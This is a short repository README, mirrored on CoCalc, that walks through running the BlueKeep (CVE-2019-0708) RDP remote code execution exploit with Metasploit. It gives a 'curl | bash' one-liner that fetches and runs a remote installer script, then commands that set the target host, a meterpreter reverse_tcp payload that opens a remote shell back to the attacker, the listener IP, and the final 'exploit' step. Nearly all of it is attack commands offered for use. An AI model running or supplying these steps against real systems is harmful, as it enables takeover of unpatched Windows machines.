Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
nu11secur1ty
GitHub Repository: nu11secur1ty/Kali-Linux
Path: blob/master/BlueKeep/README.MD
1303 views

Read more

More: https://github.com/rapid7/metasploit-framework/pull/12283

  • Start manipulating:

https://github.com/nu11secur1ty/Kali-Linux/blob/master/BlueKeep/cve_2019_0708_bluekeep_rce/cve_2019_0708_bluekeep_rce.rb#L398
  • Automation installer:

curl -s https://raw.githubusercontent.com/nu11secur1ty/Kali-Linux/master/BlueKeep/bk.sh | bash
  • SET Target:

SET RHOSTS 0.0.0.0 # target SET payload windows/64x/meterpreter/reverse_tcp # set the module SET LHOST 0.0.0.0 # Your IP for receavin
  • Check for targets

show targets
  • Set Target number

SET target x
  • Exploit the target

exploit